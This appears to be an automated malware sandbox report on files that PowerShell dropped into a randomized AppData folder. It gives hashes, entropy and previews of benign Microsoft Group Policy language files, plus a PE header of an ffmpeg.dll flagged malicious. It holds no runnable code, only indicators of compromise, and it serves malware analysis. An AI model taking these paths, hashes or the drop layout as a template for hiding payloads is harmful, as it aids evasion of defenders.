                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1453
                                                                                          Entropy (8bit):4.91354096133356
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQ2X/L2jnwwvXzAd7l4d7FFV:cgeD5x8gm8fKj2T27NmEFV
                                                                                          MD5:76D4B8899387BCD0C081D4301E1B18DE
                                                                                          SHA1:EBC1DD18A8893ED391379021941451D89692CDCD
                                                                                          SHA-256:41331BF31C4BA79B1FF7169EFA27CF37AEE5ED269C1C6894AF78F3F6FB40AE59
                                                                                          SHA-512:629E37A4E24C60A3E34795F17A5E132DBDAEF40F43AF01B451F6024A4FFC93D36F0381B0B413CE2374778C9D50326345BF0B460D7CCD8F8B5CB1A747CD66F1FF
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBlockingAppsAtShutdown">Turn off automatic termination of applications that block or cancel shutdown</string>.. <string id="AllowBlockingAppsAtShutdown_Explain">This policy setting specifies whether Windows will allow console applications and GUI applications without visible top-level windows to block or cancel shutdown. By default, such applications are automatically terminated if they attempt to cancel shutdown or block it indefinitely.....If you enable this setting, console applications or GUI applicat

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WordWheel.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2619
                                                                                          Entropy (8bit):4.83283675002977
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKEupdt44XktQFqMQFbC1RARWJUudgJjT5YMcxL5oV:LeD5pmBhIQwMQE1E5Pk9oV
                                                                                          MD5:A5FE2005E14E5E7E8792CE0C2BDF53A8
                                                                                          SHA1:D4EE1B57FE5C5387E241B51F6209DDD45A6D5BE4
                                                                                          SHA-256:8CB5F08BC1D73EE9C83EF7043A8BDA0CF250E7BEDD1C84E700E6A8A913BEAF86
                                                                                          SHA-512:332BF547D8883DF20AA82D2C6F9E3DCD89E2997EC16436A377F6135DF1136B595A9B91EB91C70BD3068F71EBA72007C4DAE32D3B0584A5FB392A9158A57036B7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomSearch">Custom Instant Search Internet search provider</string>.. <string id="CustomSearch_Explain">Set up the menu name and URL for the custom Internet search provider.....If you enable this setting, the specified menu name and URL will be used for Internet searches.....If you disable or not configure this setting, the default Internet search provider will be used.</string>.. <string id="NoSearchInternetInWordWheel">Hide the "Search the Internet" link from the Search box drop down.</string>..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WorkFolders-Client.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (591), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3464
                                                                                          Entropy (8bit):4.792120480185555
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cmD5x8gm8fK9186+SciILEl1h8gCgU+7AJcih/qAUJhbWEPIV:PD5pmh186+Sc8h8XrJcEQJxWEPIV
                                                                                          MD5:F6075FA597F6343205F02CFAF7CF87A7
                                                                                          SHA1:7A1F11393676AF8A2B8C95EEDE05007A6F2DB31E
                                                                                          SHA-256:B6A4F7EBE7A44F81B7A5D4C7A38FEA3FCFCD184FA16E46863C1535323197BE1A
                                                                                          SHA-512:40358DE36BFC342FE314B6FADACA3B1523BB05658F792F1306FC0E4334E50CADD55777069F59E0483C77A5D13C07293909F4BD2596757EF7B2D3504D37522A9A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_WorkFolders">Work Folders</string>.. <string id="Pol_MachineEnableWorkFolders">Force automatic setup for all users</string>.. <string id="Pol_MachineEnableWorkFolders_Help">This policy setting specifies whether Work Folders should be set up automatically for all users of the affected computer... ..If you enable this policy setting, Work Folders will be set up automatically for all users of the affected computer. This prevents users from choosing not to use Work Folders on the computer; it also pr

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WorkplaceJoin.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1317
                                                                                          Entropy (8bit):5.059573414260519
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2d1D5eo8gWt4+3FGxiKRI/LeVQLhqeS1FLiRj/eRBAlA5TtT849eLaa6rTM7ijFV:c1D5x8gmjKhGLJ8uwdxPkOr1jFV
                                                                                          MD5:68E7E1BEE13094C1C0F9896F82B4D741
                                                                                          SHA1:5D7F87C220EA3EB57322C9FC0986B2EFCAEBB01A
                                                                                          SHA-256:4754F8A9B020216A0F9CA4C7357A6794D3C98735D9B7857FCBC19ED1401021E3
                                                                                          SHA-512:6CCD89B24AC4D9232D45A91E3002F69230BA38A878057ABC0A0BD07F3B7A44CC9E97BE29267CBB56C9D3304EC9CA75C3E662DA1D2E154F3155A029F30C6ACF91
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2013 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Automatically workplace join client computers</displayName>.. <description>This setting lets you configure how domain-joined client computers become workplace-joined with domain users in your organization.</description>.. <resources>.. <stringTable>.. <string id="WJ_WorkplaceJoinCategory">Workplace Join</string>.. <string id="WJ_AutoJoinExplain">This setting lets you configure how domain joined client computers become workplace joined with domain users at your organization.....If this setting is enabled, domain-joined client computers will automatically become workplace-joined upon domain user logon.....Note: Additional requirements may appl

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\fthsvc.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1812
                                                                                          Entropy (8bit):4.867263783263397
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKe92tf3bDtMsabsl5/n0BshFV:LeD5pmk2tf/Ojbg1nCshFV
                                                                                          MD5:418D7AC091847AB77D095C57FA41A684
                                                                                          SHA1:3344D9A7DF3250DC67E0AE77A3852504B57FD45D
                                                                                          SHA-256:1264F3A19797D8DAEE79006048CF0430FC85D1FA8AAC8C64C5A60351C7753901
                                                                                          SHA-512:86C39CFFAC76B5417780116DCD6E264C05939C52D7E8920330FABC657AFC34EE9EC0C09EDB871B9F6B3E9C75CD1E12029B29DF6A8D12CB24A8D3810D71BDB8D2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Fault Tolerant Heap</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting permits or prohibits the Diagnostic Policy Service (DPS) from automatically resolving any heap corruption problems.....If you enable this policy setting, the DPS detects, troubleshoots, and attempts to resolve automatically any heap corruption problems.....If you disable this policy setting, Windows cann

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\hotspotauth.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1509
                                                                                          Entropy (8bit):4.960947634536891
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2ddD5eo8gWt4+3FWDELiHkM7QQhsrPKkoXWmWUD64WPb1KOFV:cdD5x8gmID1q+kkb967Pb0OFV
                                                                                          MD5:C8F213BDF5B362440A28D5D5FDD86FB8
                                                                                          SHA1:587A99FD8725FBBEF863D8D01D3993123817A8B3
                                                                                          SHA-256:8A6601421A6DE212B6B1FF4990ED462251F3C4C75CB37D7BBA0AFC814B0C50F1
                                                                                          SHA-512:966BE4DBF177B42253853A03B08447B48315FF51CF05C9FA88FA2A5A344CC9E02A357D7A7FAF61A831EDA39FA9AF35B88389FB8EAFE6BA72A8D7F8BCE90EFFB1
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Hotspot Authentication Group Policy Settings</displayName>.. <description>Hotspot Authentication Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="HotspotAuth_Category">Hotspot Authentication</string>.. <string id="HotspotAuth_Enable">Enable Hotspot Authentication</string>.. <string id="HotspotAuth_Enable_Help">This policy setting defines whether Wi-Fi hotspots are probed for Wireless Internet Service Provider roaming (WISPr) protocol support.....If a Wi-Fi hotspot supports the WISPr protocol, users can submit credentials when manually connecting to the network. If authentication is successful, users will b

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\iSCSI.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (402), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5220
                                                                                          Entropy (8bit):4.806973059665715
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmCaYOcq03f1QSxMMdeuRr48/TNZvOfxk5DxKhFwfDFpm8h7w1D7zDGFV:EPaYO503f1QSy+euRD/TNZvOfxk5DxKQ
                                                                                          MD5:FE14E28C69993ACCEC221BE3C7A99E5C
                                                                                          SHA1:AF4A9B9485D3CAE6BB21DC2932A705247C20EC01
                                                                                          SHA-256:68B3DF1ED58900E693440D614266C2F8FA20A87F75B9183A5BEBFAB5C3C6B4C2
                                                                                          SHA-512:B60557A69068D7F37CE89C724D22340E464E4DFDE039E9E4A10BE2F4458C165456872632D886EADBAA7AC72F23DAB8AF32EC1A1DAE2605EDC7D25004E878772B
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="iSCSI_Category">iSCSI</string>.. <string id="iSCSIDiscovery_Category">iSCSI Target Discovery</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers">Do not allow manual configuration of iSNS servers</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers_Help">If enabled then new iSNS servers may not be added and thus new targets discovered via those iSNS servers; existing iSNS servers may not be removed. If disabled then new iSNS servers may be added and thus new targets discovered via those

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\msched.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3422
                                                                                          Entropy (8bit):4.718448996775859
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3F+uAuj9hjwJd+ktkEbEqXf3XYonvxbBN9vBxWQcjtrh6kWR0z:cgeD5x8gmVSTuiv3Xv1IQcLzWElq2SIV
                                                                                          MD5:224BEABEB0B0C06F17CD758D7F5CA442
                                                                                          SHA1:5D6443E03F0345B93561D2958C725E963CE1EBCD
                                                                                          SHA-256:C65DA0DF5066F72EFF8B61EDF4F7B900650462FE38260C98C43A2DFCBEEF8634
                                                                                          SHA-512:17AD214FA68E221F9805472AB453B13477656AC0F7A1612F2260B369F2F1E33D0DCC2E03851A3CB72999F16EF790B56F2CC0E1C341723FD1BB0C6937FEA1B98D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Maintenance Scheduler Policies</displayName>.. <description>Maintenance Scheduler Group Policies</description>.. <resources>.. <stringTable>.. <string id="MaintenanceScheduler">Maintenance Scheduler</string>.. <string id="ActivationBoundary">Automatic Maintenance Activation Boundary</string>.. <string id="ActivationBoundaryHelp">.. This policy setting allows you to configure Automatic Maintenance activation boundary..... The maintenance activation boundary is the daily schduled time at which Automatic Maintenance starts.... If you enable this policy setting, this will override the default daily scheduled time

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\nca.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (532), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8481
                                                                                          Entropy (8bit):4.839330009877803
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:xvEwDvJfTqcK3KoGmwrtrqGryq5hP8lv5UNgTe:xvE8fWVQpHOq5hP8vuge
                                                                                          MD5:913C464CFBD79FBB24DDDB6A91D1C375
                                                                                          SHA1:DE4AB693B5B746695B00E6F00EFC190D7541242F
                                                                                          SHA-256:6E3E490033E86709BBEAD8A1CA4F35DD478297BD932A76C3D9942DD59F8AC27F
                                                                                          SHA-512:346C4AA6FBC299ECC94C2CA4970A4EC4867235FD9268E4E89C2F32D526A1F75824565442B555080CD374C229D6C5ECFD2CF6B7B96DC85FCABD14F9225FE05CEB
                                                                                          Malicious:false
                                                                                          Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>DirectAccess Client Experience Settings Group Policy Template</displayName>.. <description>This admx file describes policy template for DirectAccess Client NCA component</description>.. <resources>.. <stringTable>.. <string id="NCA">DirectAccess Client Experience Settings</string>.. <string id="NCA_Help">This is the group policy template for DirectAccess Client Experience Settings. Please read the DirectAccess deployment guide for more information.</string>.. <string id="SupportEmail">Support Email Address</string>.. <string id="SupportEmail_Help">Specifies the e-mail address to be used when sending the log files that are generated by NCA to the network administrator. ....When the user sends the log files to the Administrator, NCA uses the default e-mail client to open a new message with the support email address in the To: field of the message, then attaches the generated log files

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\pca.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (379), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6236
                                                                                          Entropy (8bit):4.8210465928673445
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm0ybro3NXRz6/LPrwwfsHO+/7Oaj3V:EDyXo3NXRz+0w0HdjtjF
                                                                                          MD5:78021A8DEB0981DD65154025032BB7D5
                                                                                          SHA1:5B59F46A232E9752D6405949564B435D1AD709B5
                                                                                          SHA-256:899C5FF462E34E8319AC0C59A9BC794695166970BA28495C473754FA5C3DE457
                                                                                          SHA-512:C4BBA2C6A05B10A74D603225CE69BF6EC3D08CF8039D56E5118774179A628A237F9119C09215C4FEB7BE5D5D06A8E5CF6B07FE2822D0AF7E65FEFD47FA9E039E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>...... Overall category text -->.. <string id="PcaScenarioCategory">Application Compatibility Diagnostics</string>.. .... Generic WDI text -->.. <string id="WdiScenarioExecutionPolicyLevelResolution">Detection, Troubleshooting and Resolution</string>.. <string id="WdiScenarioExecutionPolicyLevelTsOnly">Detection and Troubleshooting Only</string>...... Individual scenario text -->.. <string id="DetectBlockedDriversText">Notify blocked drivers</string>.. <string id="DetectDepre

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\sdiageng.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (423), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3289
                                                                                          Entropy (8bit):4.684667062227081
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cVD5x8gmnwOx5XzQfO4ZQZr4VdF+kHdqblrmG7FV:WD5pmnwOX4aadF+odcmG7FV
                                                                                          MD5:145EB767DFAAC5B7D79A9DF8C4FD6504
                                                                                          SHA1:EF931F6BD052785B77B640F310BB593DA3FBC881
                                                                                          SHA-256:F2483555C3531D0821703D3696ACBFE5528A031D762661249CD6DF8434ACCFC3
                                                                                          SHA-512:8B5AC9ABF5870C9F2D9708E8858121815CE875E379700E7E4797F84631802D82FFE0A32C1983CF23BD6B09D775965F0192939D03CAC6F1E5FD2B54CC55EE2602
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Scripted Diagnostics</displayName>.. <description>Scripted Diagnostics</description>.. <resources>.. <stringTable>.. <string id="ScriptedDiagnosticsCategory">Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicy">Configure Security Policy for Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicyExplain">This policy setting determines whether scripted diagnostics will execute diagnostic packages that are signed by untrusted publishers.....If you enable this policy setting, the scripted diagnostics execution engine validates the signer of any diagnostic package and runs only those signed by trust

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\srm-fci.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (472), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7668
                                                                                          Entropy (8bit):4.73074137043816
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:wNa+/IQexYsInNwFxpeHe+zpoDQzwvU9Q7nwefXvU9Q7HTV:G/In5xpe++zpoDhv8w/v80
                                                                                          MD5:7B04E3F4356B26D851628246DAC94705
                                                                                          SHA1:AB5AC1954A3652BCB12946B607C2B1F4D876DA21
                                                                                          SHA-256:E6F4193F29666226D72365C364E473F1F9DEB47405DFEDCA38A215EB61FFF967
                                                                                          SHA-512:E1A0C7A200AEDCD3FB55E64BF67A0EE9EED91C0632C178A54FA98E20D9B4C32680F17900BC66017FEF3F595A6FCA06624B2C0CF7D5B4E8490C177F3AFAC1A414
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File Classification Infrastructure Group Policy Definitions</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="AdrCat">Access-Denied Assistance</string>.. <string id="FciCat">File Classification Infrastructure</string>.. <string id="EnableManualUXDisplay">File Classification Infrastructure: Display Classification tab in File Explorer</string>.. <string id="EnableShellExecuteFileStreamCheck">Enable access-denied assistance on client for all file types</string>.. <string id="EnableShellExecuteFileStreamCheck_Descr">This Group Policy Setting should be set on Windows clients to enable access-denied assistance for all file types</string>.. <string id="EnableManualUXExplain">This policy setting controls whether the Classification

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\tcpip.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (431), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13466
                                                                                          Entropy (8bit):4.782394839113498
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmjKFPT4fv3EIrv3Iv/g8/vRzZxOkRvhRkKSbHw1cZICCHzBaTBeQqqL7tgA:E6fv3EWv3Ivo8Fn/nYwrqjvigA95Zy/D
                                                                                          MD5:0B0DA2277FE7B257B26ED87E595CDCF5
                                                                                          SHA1:5F790C95E1703A243F0678FDF521772811B4D352
                                                                                          SHA-256:89EC65C0144936DE7A31B903D9A8DBD2E436FD098DE9AA91EAF164A5A8B6DB1B
                                                                                          SHA-512:581018F7E5E6ACFBB4D7E8B6BDADCA26ABE829ED1E12AAF1B86FB70857DF9B2290056B3890E969A62DA027399FA4624E1B9478679B91632AD1CE12D1A09D0250
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>TCPIP Group Policy Template file</displayName>.. <description>This admx file describes policy template for TCPIP components</description>.. <resources>.. <stringTable>.. <string id="TCPIP">TCPIP Settings</string>.. <string id="Ipv6Transition">IPv6 Transition Technologies</string>.... <string id="ISATAP_State">Set ISATAP State</string>.. <string id="ISATAP_Router_Name">Set ISATAP Router Name</string>.. <string id="6to4_State">Set 6to4 State</string>.. <string id="6to4_Router_Name">Set 6to4 Relay Name</string>.. <string id="6to4_Router_Name_Resolution_Interval">Set 6to4 Relay Name Resolution Interval</string>.. <s

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\wlansvc.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1977
                                                                                          Entropy (8bit):4.903195660648944
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cwD5x8gmipnasavWANaqwDtCsiFsaMQnV:lD5pmipasavWuaqwhsFsaM0V
                                                                                          MD5:13E20C78E89E7FC58934BCFF584E12A1
                                                                                          SHA1:52DCC829C427CE609034C9106460C7734BEBD3ED
                                                                                          SHA-256:A59E2ED355AC803474C9EF02A60076BB98ADBB33AD6AA6884AB1B4850BAC4C02
                                                                                          SHA-512:14C6DB1DCB97692D561C961A5A1A5F0F25BC6CC3CB28DC878CD46296339E16C36BA8A364BE4F80A42D2C27725BECDED3020DC68BE820F0343FE92A961F018966
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WLAN Service Group Policy Settings</displayName>.. <description>WLAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WlanSvc_Category">WLAN Service</string>.. <string id="NetworkCost_Category">WLAN Media Cost</string>.. <string id="SetCost">Set Cost</string>.. <string id="SetCost_Help">This policy setting configures the cost of Wireless LAN (WLAN) connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all WLAN connections on the local m

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\wwansvc.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2971
                                                                                          Entropy (8bit):4.817228267034193
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cwD5x8gmL0PfvW8N0qwDtCsiFcs2mANRqwDtCsiFnMlpV:lD5pmL0PfvWq0qwhsFcs2muRqwhsFnM1
                                                                                          MD5:761AF87D50F53F0CE9947B5D486C30FA
                                                                                          SHA1:DC926F9449848CCE778326607BD4787ED6C80A01
                                                                                          SHA-256:8F1F6C7509F5C7C27B8F6E5DCF81FB8C02AE3FFEE825F6CFA4171A712BE018D4
                                                                                          SHA-512:ECCF653D5935C3777F14F08C0F5318B927E230C08AAA09DEBFD09ACA23A27B0887FE94A8670B635FD7D7B6ACCF3D3DFED2BFBCD02298A5B58089D66219A7E366
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WWAN Service Group Policy Settings</displayName>.. <description>WWAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WwanSvc_Category">WWAN Service</string>.. <string id="NetworkCost_Category">WWAN Media Cost</string>.. <string id="SetCost3G">Set 3G Cost</string>.. <string id="SetCost3G_Help">This policy setting configures the cost of 3G connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all 3G connections on the local machine:....

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2704792
                                                                                          Entropy (8bit):6.725743776039723
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:ImBYJtMTl/GuTvOCnCaYXWRTDF8fLen6yfZ0rO43PSGgt2:9OC9YXeTDFWD5PZ
                                                                                          MD5:449BF7A46490FA07881D969B6D52C0F1
                                                                                          SHA1:E520A8318E867C7840E6DEADEF36ABCDF2894417
                                                                                          SHA-256:5883D041C5F5020AC4B66314D5F89CB6331DB3C4EC1C912F72B3EBB9AA8C41E2
                                                                                          SHA-512:EABAA33B037BA9F1EE874C534D85AD281985E85E1DD2C115A2693F56381A9A596F22B16938916FD34804A3D490CD0AC53A2969C5F73A923B163C5474FEA91B91
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....{.f.........." .....~ .........`........................................0s.......)...`A.........................................I'......O'.(.............q.......)..)....r..3..."'......................!'.(.... .@............R'.8............................text...u| ......~ ................. ..`.rdata...d.... ..f.... .............@..@.data.....I...(.."....'.............@....pdata........q.......(.............@..@.gxfg....,....r.......(.............@..@.retplne......r.......(..................tls..........r.......(.............@..._RDATA........r.......(.............@..@.reloc...3....r..4....(.............@..B................................................................................................................................................................................................................................................................

